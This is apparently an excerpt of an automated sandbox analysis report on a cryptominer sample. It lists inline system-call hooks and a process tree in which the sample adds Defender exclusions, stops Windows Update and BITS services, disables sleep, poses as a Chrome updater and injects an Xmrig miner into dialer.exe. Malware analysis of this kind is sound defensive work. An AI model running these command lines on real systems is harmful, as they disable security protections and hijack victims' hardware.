                                                                                                                          Code Manipulations

                                                                                                                          Function NameHook TypeActive in Processes
                                                                                                                          ZwEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                                                                                          NtQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                                                                                          ZwResumeThreadINLINEwinlogon.exe, explorer.exe
                                                                                                                          NtDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                                                                                          ZwDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                                                                                          NtEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                                                                                          NtQueryDirectoryFileINLINEwinlogon.exe, explorer.exe
                                                                                                                          ZwEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                                                                                          ZwQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                                                                                          NtResumeThreadINLINEwinlogon.exe, explorer.exe
                                                                                                                          RtlGetNativeSystemInformationINLINEwinlogon.exe, explorer.exe
                                                                                                                          NtQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                                                                                          NtEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                                                                                          ZwQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                                                                                          ZwQueryDirectoryFileINLINEwinlogon.exe, explorer.exe
                                                                                                                          Function NameHook TypeNew Data
                                                                                                                          ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                          NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                          ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                          NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                          ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                          NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                          NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                          ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                          ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                          NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                          RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                          NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                          NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                          ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                          ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                          Function NameHook TypeNew Data
                                                                                                                          ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                          NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                          ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                          NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                          ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                          NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                          NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                          ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                          ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                          NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                          RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                          NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                          NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                          ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                          ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Click to jump to process

                                                                                                                          Target ID:0
                                                                                                                          Start time:17:25:52
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Users\user\Desktop\hiwA7Blv7C.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Users\user\Desktop\hiwA7Blv7C.exe"
                                                                                                                          Imagebase:0x7ff727270000
                                                                                                                          File size:5'925'152 bytes
                                                                                                                          MD5 hash:7BF019893EB8DF6FC169E8F9EF5269C6
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:2
                                                                                                                          Start time:17:25:52
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                          Imagebase:0x7ff6e3d50000
                                                                                                                          File size:452'608 bytes
                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:3
                                                                                                                          Start time:17:25:52
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:5
                                                                                                                          Start time:17:25:56
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                          Imagebase:0x7ff7255e0000
                                                                                                                          File size:289'792 bytes
                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:6
                                                                                                                          Start time:17:25:56
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:7
                                                                                                                          Start time:17:25:56
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:sc stop UsoSvc
                                                                                                                          Imagebase:0x7ff7e6e10000
                                                                                                                          File size:72'192 bytes
                                                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:8
                                                                                                                          Start time:17:25:56
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:sc stop WaaSMedicSvc
                                                                                                                          Imagebase:0x7ff7e6e10000
                                                                                                                          File size:72'192 bytes
                                                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:9
                                                                                                                          Start time:17:25:56
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:sc stop wuauserv
                                                                                                                          Imagebase:0x7ff7e6e10000
                                                                                                                          File size:72'192 bytes
                                                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:10
                                                                                                                          Start time:17:25:56
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:sc stop bits
                                                                                                                          Imagebase:0x7ff7e6e10000
                                                                                                                          File size:72'192 bytes
                                                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:11
                                                                                                                          Start time:17:25:56
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:sc stop dosvc
                                                                                                                          Imagebase:0x7ff7e6e10000
                                                                                                                          File size:72'192 bytes
                                                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:12
                                                                                                                          Start time:17:25:56
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                                          Imagebase:0x7ff7255e0000
                                                                                                                          File size:289'792 bytes
                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:13
                                                                                                                          Start time:17:25:56
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:14
                                                                                                                          Start time:17:25:56
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\dialer.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\dialer.exe
                                                                                                                          Imagebase:0x7ff674890000
                                                                                                                          File size:39'936 bytes
                                                                                                                          MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:16
                                                                                                                          Start time:17:25:56
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                                                                          Imagebase:0x7ff6ec9c0000
                                                                                                                          File size:96'256 bytes
                                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:18
                                                                                                                          Start time:17:25:56
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:powercfg /x -hibernate-timeout-dc 0
                                                                                                                          Imagebase:0x7ff6ec9c0000
                                                                                                                          File size:96'256 bytes
                                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:21
                                                                                                                          Start time:17:25:57
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:powercfg /x -standby-timeout-ac 0
                                                                                                                          Imagebase:0x7ff6ec9c0000
                                                                                                                          File size:96'256 bytes
                                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:22
                                                                                                                          Start time:17:25:57
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:powercfg /x -standby-timeout-dc 0
                                                                                                                          Imagebase:0x7ff6ec9c0000
                                                                                                                          File size:96'256 bytes
                                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:23
                                                                                                                          Start time:17:25:58
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\winlogon.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:winlogon.exe
                                                                                                                          Imagebase:0x7ff70f350000
                                                                                                                          File size:906'240 bytes
                                                                                                                          MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:26
                                                                                                                          Start time:17:25:58
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Program Files\Google\Chrome\updater.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\updater.exe"
                                                                                                                          Imagebase:0x7ff656990000
                                                                                                                          File size:5'925'152 bytes
                                                                                                                          MD5 hash:7BF019893EB8DF6FC169E8F9EF5269C6
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Avira
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 61%, ReversingLabs
                                                                                                                          Has exited:true

                                                                                                                          Target ID:27
                                                                                                                          Start time:17:25:58
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\lsass.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\lsass.exe
                                                                                                                          Imagebase:0x7ff7ac940000
                                                                                                                          File size:59'456 bytes
                                                                                                                          MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:28
                                                                                                                          Start time:17:25:58
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                          Imagebase:0x7ff6e3d50000
                                                                                                                          File size:452'608 bytes
                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:29
                                                                                                                          Start time:17:25:58
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:30
                                                                                                                          Start time:17:25:58
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                                          Imagebase:0x7ff7403e0000
                                                                                                                          File size:55'320 bytes
                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:31
                                                                                                                          Start time:17:25:58
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\dwm.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"dwm.exe"
                                                                                                                          Imagebase:0x7ff68eb30000
                                                                                                                          File size:94'720 bytes
                                                                                                                          MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:32
                                                                                                                          Start time:17:26:00
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                          Imagebase:0x7ff7255e0000
                                                                                                                          File size:289'792 bytes
                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:33
                                                                                                                          Start time:17:26:00
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:34
                                                                                                                          Start time:17:26:00
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:sc stop UsoSvc
                                                                                                                          Imagebase:0x7ff7e6e10000
                                                                                                                          File size:72'192 bytes
                                                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:35
                                                                                                                          Start time:17:26:00
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:sc stop WaaSMedicSvc
                                                                                                                          Imagebase:0x7ff7e6e10000
                                                                                                                          File size:72'192 bytes
                                                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:36
                                                                                                                          Start time:17:26:00
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:sc stop wuauserv
                                                                                                                          Imagebase:0x7ff7e6e10000
                                                                                                                          File size:72'192 bytes
                                                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:37
                                                                                                                          Start time:17:26:00
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:sc stop bits
                                                                                                                          Imagebase:0x7ff7e6e10000
                                                                                                                          File size:72'192 bytes
                                                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:38
                                                                                                                          Start time:17:26:00
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:sc stop dosvc
                                                                                                                          Imagebase:0x7ff7e6e10000
                                                                                                                          File size:72'192 bytes
                                                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:39
                                                                                                                          Start time:17:26:00
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                                          Imagebase:0x7ff7255e0000
                                                                                                                          File size:289'792 bytes
                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:40
                                                                                                                          Start time:17:26:00
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:41
                                                                                                                          Start time:17:26:00
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                                                                          Imagebase:0x7ff6ec9c0000
                                                                                                                          File size:96'256 bytes
                                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:42
                                                                                                                          Start time:17:26:01
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\dialer.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\dialer.exe
                                                                                                                          Imagebase:0x7ff674890000
                                                                                                                          File size:39'936 bytes
                                                                                                                          MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:44
                                                                                                                          Start time:17:26:01
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:powercfg /x -hibernate-timeout-dc 0
                                                                                                                          Imagebase:0x7ff6ec9c0000
                                                                                                                          File size:96'256 bytes
                                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:46
                                                                                                                          Start time:17:26:01
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                                          Imagebase:0x7ff7403e0000
                                                                                                                          File size:55'320 bytes
                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:47
                                                                                                                          Start time:17:26:01
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\dialer.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\dialer.exe
                                                                                                                          Imagebase:0x7ff674890000
                                                                                                                          File size:39'936 bytes
                                                                                                                          MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                          Has exited:false

                                                                                                                          Target ID:48
                                                                                                                          Start time:17:26:01
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:powercfg /x -standby-timeout-ac 0
                                                                                                                          Imagebase:0x7ff6ec9c0000
                                                                                                                          File size:96'256 bytes
                                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:49
                                                                                                                          Start time:17:26:01
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:powercfg /x -standby-timeout-dc 0
                                                                                                                          Imagebase:0x7ff6ec9c0000
                                                                                                                          File size:96'256 bytes
                                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:50
                                                                                                                          Start time:17:26:01
                                                                                                                          Start date:02/01/2025
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
